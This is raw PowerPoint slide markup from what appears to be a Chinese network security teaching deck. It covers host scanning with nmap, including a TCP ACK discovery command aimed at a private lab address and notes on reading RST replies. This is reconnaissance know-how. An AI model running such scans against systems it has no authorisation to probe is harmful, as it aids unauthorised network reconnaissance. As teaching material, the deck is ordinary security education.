              <a:t>5.主要关注的是最后一个RST数据包，因为RST数据包决定了目标是否存活，如图2-2-12所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="1577658"/>
            <a:ext cx="5276850" cy="3609975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="文本框 116"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="5187633"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-12 返回的RST数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP ACK协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤三</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="文本框 116"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5655945" y="1823402"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.使用“nmap -sn -PA --send-ip 192.168.172.129”命令进行TCP ACK主机发现，“-PA”参数表示使用TCP协议中的ACK包进行扫描。如图2-2-13所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5655945" y="2745423"/>
            <a:ext cx="5019675" cy="1228725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="文本框 117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5655945" y="3974148"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-13 使用-PA参数进行扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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5" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1847711" y="1845636"/>
            <a:ext cx="2926715" cy="1638300"/>
            <a:chOff x="280807" y="-427279"/>
            <a:chExt cx="3055299" cy="2252704"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="280807" y="-427279"/>
              <a:ext cx="3055299" cy="2252704"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1415026" y="-203755"/>
              <a:ext cx="1066603" cy="1482594"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596789" y="1989833"/>
            <a:ext cx="7328535" cy="1258570"/>
            <a:chOff x="3663165" y="953426"/>
            <a:chExt cx="5496401" cy="1108953"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4060358" y="1005461"/>
              <a:ext cx="4914900" cy="622737"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2.1 常用命令</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3663165" y="953426"/>
              <a:ext cx="5496401" cy="1108953"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tn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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP ACK协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤三</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
